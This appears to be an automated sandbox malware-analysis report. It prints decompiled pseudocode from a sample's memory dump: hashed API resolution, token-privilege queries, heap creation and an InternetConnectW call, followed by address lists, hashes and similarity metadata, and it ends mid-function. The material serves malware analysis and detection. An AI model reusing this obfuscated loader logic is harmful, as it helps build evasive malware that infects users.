									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E00417BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = E00417564(0xa1310f65);
											if(_t214 == 0) {
												if(E00416C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = E00417564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E004167C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x43b1f4; // 0x2491340
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x43b1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = E00417564(0x3ab94787);
												if(_t198 == 0) {
													if(E00416C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = E00417564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E004167C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E00429350(_t285 + 4);
																_t250 =  *0x43b1f4; // 0x2491340
																if(_t250 == 0xc139578) {
																	 *0x43b1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = E00417564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E00416C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = E00417564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E004167C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E00429640(_t285 + 4, 0);
																					_t112 = GetTokenInformation( *(_t285 + 0x44), 2, _t109, E00429650(_t285), _t285 + 0x30); // executed
																					if(_t112 == 0) {
																						_t253 =  *0x43b1f4; // 0x2491340
																						if(_t253 == 0xc139578) {
																							 *0x43b1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = E00417564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E00416C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = E00417564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E004167C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t70 = _t253 + 0x180; // 0x2498fa8
																									_t253 =  *_t70;
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E00429640(_t285 + 4, 0);
																						_t118 =  *0x43a148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x43a14c & 0x0000ffff;
																						_t255 =  *0x43b1f4; // 0x2491340
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x43b1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = E00417564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E00416C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = E00417564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E004167C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											E00429510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E0042BE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
																											if( *_t205() == 0) {
																												_t258 =  *0x43b1f4; // 0x2491340
																												if(_t258 == 0xc139578) {
																													 *0x43b1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = E00417564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E00416C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = E00417564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E004167C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t63 = _t258 + 0x180; // 0x2498fa8
																															_t258 =  *_t63;
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														E00429510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E0042BE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x43b1f4; // 0x2491340
																														if(_t259 == 0xc139578) {
																															 *0x43b1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = E00417564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E00416C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = E00417564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E004167C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t52 = _t259 + 0x180; // 0x2498fa8
																																	_t259 =  *_t52;
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x43b1f4; // 0x2491340
																														if(_t261 == 0xc139578) {
																															 *0x43b1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = E00417564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E00416C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = E00417564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E004167C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t42 = _t261 + 0x180; // 0x2498fa8
																																	_t261 =  *_t42;
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t33 = _t255 + 0x180; // 0x2498fa8
																									_t255 =  *_t33;
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					E00429510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E0042BE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t21 = _t250 + 0x180; // 0x2498fa8
																			_t250 =  *_t21;
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E0042BE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x43b1f4; // 0x2491340
																if(_t267 == 0xc139578) {
																	 *0x43b1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = E00417564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E00416C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = E00417564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E004167C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t77 = _t267 + 0x180; // 0x2498fa8
																			_t267 =  *_t77;
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t12 = _t249 + 0x180; // 0x2498fa8
													_t249 =  *_t12;
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t4 = _t246 + 0x180; // 0x2498fa8
							_t246 =  *_t4;
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x004147b0
0x004147b0
0x004147b2
0x004147b5
0x004147bb
0x004147c9
0x004150e3
0x00000000
0x004147cf
0x004147d1
0x004147fe
0x00414803
0x00414809
0x0041480d
0x004150ba
0x004150c5
0x004150cb
0x004150cb
0x004150ba
0x00414815
0x00000000
0x0041481b
0x00414822
0x0041482a
0x00000000
0x0041482a
0x004147d3
0x004147d3
0x004147d3
0x004147d5
0x004147d7
0x004147e5
0x004147e6
0x004147ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004147ec
0x004150d2
0x004150d8
0x0041482c
0x0041482e
0x004148fc
0x00414903
0x00414834
0x00414838
0x00414839
0x0041483b
0x00414841
0x0041504d
0x00415054
0x0041507a
0x0041507c
0x00000000
0x0041507e
0x0041507e
0x0041507f
0x0041507f
0x00415056
0x0041505b
0x00415061
0x00415065
0x0041509d
0x004150a4
0x004150aa
0x004150aa
0x0041509d
0x00415069
0x0041508d
0x00415082
0x00000000
0x00415088
0x00000000
0x00415088
0x0041506b
0x00415072
0x00415075
0x00000000
0x00415075
0x00415069
0x00414847
0x00414847
0x0041484b
0x00414851
0x00414855
0x0041485a
0x00414868
0x00415038
0x00000000
0x0041486e
0x00414870
0x0041489d
0x004148a2
0x004148a8
0x004148ac
0x0041500f
0x0041501a
0x00415020
0x00415020
0x0041500f
0x004148b4
0x00000000
0x004148b6
0x004148bd
0x004148c5
0x00000000
0x004148c5
0x00414872
0x00414872
0x00414872
0x00414874
0x00414876
0x00414884
0x00414885
0x0041488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041488b
0x00415027
0x0041502d
0x004148c7
0x004148c9
0x004148e4
0x004148e4
0x004148ea
0x00414904
0x00414909
0x0041490e
0x0041491a
0x00414f51
0x00000000
0x00414920
0x00414922
0x0041494f
0x00414954
0x0041495a
0x0041495e
0x00414f28
0x00414f33
0x00414f39
0x00414f39
0x00414f28
0x00414966
0x00000000
0x00414968
0x0041496f
0x00414977
0x00000000
0x00414977
0x00414924
0x00414924
0x00414924
0x00414926
0x00414928
0x00414936
0x00414937
0x0041493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041493d
0x00414f40
0x00414f46
0x00414979
0x0041497b
0x004149a3
0x004149c1
0x004149c5
0x00414e71
0x00414e7d
0x00414f10
0x00000000
0x00414e83
0x00414e85
0x00414eae
0x00414eb3
0x00414eb9
0x00414ebd
0x00414ef5
0x00414efc
0x00414f02
0x00414f02
0x00414ef5
0x00414ec1
0x00000000
0x00414ec3
0x00414eca
0x00414ecd
0x00000000
0x00414ecd
0x00414e87
0x00414e87
0x00414e87
0x00414e89
0x00414e8b
0x00414e95
0x00414e96
0x00414e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414e9c
0x00414f06
0x00414f0c
0x00414ed2
0x00414ed4
0x00414ee5
0x00414eda
0x00000000
0x00414ee0
0x00000000
0x00414ee0
0x00414ed6
0x00414ed6
0x00414ed7
0x00414ed7
0x00414f0e
0x00000000
0x00414f0e
0x00000000
0x00414e9e
0x00414e9e
0x00414ea4
0x00414ea4
0x00414eaa
0x00000000
0x00414e87
0x00414e85
0x004149cb
0x004149cb
0x004149d6
0x004149df
0x004149e4
0x004149e9
0x004149ef
0x004149f7
0x00414a01
0x00414e62
0x00000000
0x00414a07
0x00414a09
0x00414a36
0x00414a3b
0x00414a41
0x00414a45
0x00414e39
0x00414e44
0x00414e4a
0x00414e4a
0x00414e39
0x00414a4d
0x00000000
0x00414a53
0x00414a5a
0x00414a62
0x00000000
0x00414a62
0x00414a0b
0x00414a0b
0x00414a0b
0x00414a0d
0x00414a0f
0x00414a1d
0x00414a1e
0x00414a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414a24
0x00414e51
0x00414e57
0x00414a64
0x00414a66
0x00414bef
0x00414bf2
0x00414bfc
0x00414c02
0x00414c02
0x00414c0e
0x00414a6c
0x00414a76
0x00414a77
0x00414a78
0x00414a79
0x00414a7a
0x00414a7b
0x00414a7c
0x00414a7d
0x00414a82
0x00414a84
0x00414a86
0x00414a8b
0x00414d80
0x00414d8c
0x00414e21
0x00000000
0x00414d92
0x00414d94
0x00414dbf
0x00414dc4
0x00414dca
0x00414dce
0x00414e06
0x00414e0d
0x00414e13
0x00414e13
0x00414e06
0x00414dd2
0x00000000
0x00414dd4
0x00414ddb
0x00414dde
0x00000000
0x00414dde
0x00414d96
0x00414d98
0x00414d98
0x00414d9a
0x00414d9c
0x00414da6
0x00414da7
0x00414dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414dad
0x00414e17
0x00414e1d
0x00414de3
0x00414de5
0x00414df6
0x00414deb
0x00000000
0x00414df1
0x00000000
0x00414df1
0x00414de7
0x00414de7
0x00414de8
0x00414de8
0x00414e1f
0x00000000
0x00414e1f
0x00000000
0x00414daf
0x00414daf
0x00414db5
0x00414db5
0x00414dbb
0x00000000
0x00414d98
0x00414d94
0x00414a91
0x00414a91
0x00414a91
0x00414a99
0x00414b47
0x00414b49
0x00414b54
0x00414b50
0x00414b50
0x00414b50
0x00414b5b
0x00414bcf
0x00414bd2
0x00414bdc
0x00414be2
0x00414be2
0x00414bee
0x00414b5d
0x00414b5d
0x00414b69
0x00414d2d
0x00000000
0x00414b6f
0x00414b71
0x00414ba0
0x00414ba5
0x00414bab
0x00414baf
0x00414d04
0x00414d0f
0x00414d15
0x00414d15
0x00414d04
0x00414bb7
0x00000000
0x00414bb9
0x00414bc0
0x00414bc3
0x00000000
0x00414bc3
0x00414b73
0x00414b75
0x00414b75
0x00414b77
0x00414b79
0x00414b87
0x00414b88
0x00414b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414b8e
0x00414d1c
0x00414d22
0x00414bc8
0x00414bca
0x00000000
0x00414bcc
0x00414bcc
0x00414bcd
0x00414bce
0x00414bce
0x00414d28
0x00000000
0x00414d28
0x00000000
0x00414b90
0x00414b90
0x00414b96
0x00414b96
0x00414b9c
0x00000000
0x00414b75
0x00414b71
0x00414b69
0x00414a9f
0x00414aa1
0x00414aa5
0x00414aa9
0x00414aab
0x00414aaf
0x00414ab1
0x00414ab1
0x00414abd
0x00414d71
0x00000000
0x00414ac3
0x00414ac5
0x00414af4
0x00414af9
0x00414aff
0x00414b03
0x00414d48
0x00414d53
0x00414d59
0x00414d59
0x00414d48
0x00414b0b
0x00000000
0x00414b0d
0x00414b14
0x00414b17
0x00000000
0x00414b17
0x00414ac7
0x00414ac9
0x00414ac9
0x00414acb
0x00414acd
0x00414adb
0x00414adc
0x00414ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414ae2
0x00414d60
0x00414d66
0x00414b1c
0x00414b1e
0x00000000
0x00414b20
0x00414b20
0x00414b24
0x00414b28
0x00414b29
0x00414b29
0x00414d6c
0x00000000
0x00414d6c
0x00000000
0x00414ae4
0x00414ae4
0x00414aea
0x00414aea
0x00414af0
0x00000000
0x00414ac9
0x00414ac5
0x00000000
0x00414b32
0x00414b32
0x00414b33
0x00414b3b
0x00414b3f
0x00000000
0x00414b43
0x00414a99
0x00414a8b
0x00414e5d
0x00000000
0x00414e5d
0x00000000
0x00414a26
0x00414a26
0x00414a2c
0x00414a2c
0x00414a32
0x00000000
0x00414a0b
0x00414a09
0x00414a01
0x0041497d
0x0041497d
0x00414980
0x0041498a
0x00414990
0x00414990
0x0041499c
0x0041499c
0x00414f4c
0x00000000
0x00414f4c
0x00000000
0x0041493f
0x0041493f
0x00414945
0x00414945
0x0041494b
0x00000000
0x00414924
0x00414922
0x004148ec
0x004148f1
0x004148f7
0x004148f7
0x00000000
0x004148f1
0x004148cb
0x004148da
0x004148de
0x00414f60
0x00414f6c
0x00414fda
0x00000000
0x00414f6e
0x00414f70
0x00414f99
0x00414f9e
0x00414fa4
0x00414fa8
0x00414ff2
0x00414ff9
0x00414fff
0x00414fff
0x00414ff2
0x00414fac
0x00000000
0x00414fb2
0x00414fb9
0x00414fbc
0x00000000
0x00414fbc
0x00414f72
0x00414f72
0x00414f72
0x00414f74
0x00414f76
0x00414f80
0x00414f81
0x00414f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414f87
0x00414fd0
0x00414fd6
0x00414fc1
0x00414fc3
0x00000000
0x00414fc9
0x00414fc9
0x00414fca
0x00414fca
0x00414fd8
0x00000000
0x00414fd8
0x00000000
0x00414f89
0x00414f89
0x00414f8f
0x00414f8f
0x00414f95
0x00000000
0x00414f72
0x00414f70
0x00000000
0x00000000
0x00000000
0x004148de
0x00415033
0x00000000
0x00415033
0x00000000
0x0041488d
0x0041488d
0x00414893
0x00414893
0x00414899
0x00000000
0x00414872
0x00414870
0x00414868
0x00414841
0x004150de
0x00000000
0x004150de
0x00000000
0x004147ee
0x004147ee
0x004147f4
0x004147f4
0x004147fa
0x00000000
0x004147d3
0x004147d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 004148DA
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?,00000000), ref: 004149C1

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: a5a87bc2bf61210974c261d416e7d99fd2450852ac64df22e1b2e34ea0db36eb
Instruction ID: 4be4f207a852f0d65f00ec1240eb89964f647894601f738b66c5c42a9d05a9a8
Opcode Fuzzy Hash: a5a87bc2bf61210974c261d416e7d99fd2450852ac64df22e1b2e34ea0db36eb
Instruction Fuzzy Hash: 31120B307083029BDB24DAA588D57EB7296ABD4748F18863FE55587352EB3CCCC5C25D

Uniqueness

Uniqueness Score: -1.00%

Function 00411030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00411030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x43b1e0 == 0xe99c89bf) {
					_t9 = E004115C0(0x588ab3ea, 0xc0b67de0);
					 *0x43b1e4 = E004115C0(0x588ab3ea, 0x82d274c4);
					if( *0x43b1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x43b1e0 = 0;
					}
				}
				_t4 = E004115C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_t1 = _t11 + 8; // 0x416c6a
					_push( *_t1);
					_push(8);
					_push( *0x43b1e0);
					asm("int3");
					return _t4;
				}
			}

0x0041103b
0x00411073
0x00411084
0x00411093
0x0041109e
0x004110a0
0x004110a0
0x00411093
0x00411047
0x0041104e
0x00411063
0x00411050
0x00411050
0x00411050
0x00411054
0x00411056
0x0041105c
0x0041105d
0x0041105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,00418864,00000000,00000000,00000000,?), ref: 0041109E

Strings

jlA, xrefs: 00411050

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID: jlA
API String ID: 10892065-1922220617
Opcode ID: e8008fb4e68b2a9bba5438d26598ce62b61b7dcc5e22b59f64ee3e09f578e4b8
Instruction ID: 1eb2ba4147ffaf15ff601247141352a85416451768c1349e396ec9e232395201
Opcode Fuzzy Hash: e8008fb4e68b2a9bba5438d26598ce62b61b7dcc5e22b59f64ee3e09f578e4b8
Instruction Fuzzy Hash: 27F0A738400244BEEB209B715D16BBA39D9EB443D4F00043AF705945B1FF284590D35E

Uniqueness

Uniqueness Score: -1.00%

Function 00433370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00433370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E004206A0( &(_t254[4]), __ecx, 0);
				E004206A0( &(_t254[8]), __ecx, 0);
				E004206A0( &(_t254[0xc]), __ecx, 0);
				E004206A0( &(_t254[0x10]), __ecx, 0);
				E00434D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E00418810( &(_t254[0x1e]), 0);
				E004187A0( &(_t254[0x20]));
				E004187A0( &(_t254[0x24]));
				_t102 = E00420220( &(_t254[0x20]), _t254[0x26], 0);
				E004187A0( &(_t254[0x28]));
				E00420220(_t102, _t254[0x2a], 0);
				E00418CA0( &(_t254[0x28]));
				E00418CA0( &(_t254[0x24]));
				if(E00421000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E0042D620(_t242, E00426040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(E004115C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = E004115C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x43b248; // 0xe3a10e7e
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E00417F00();
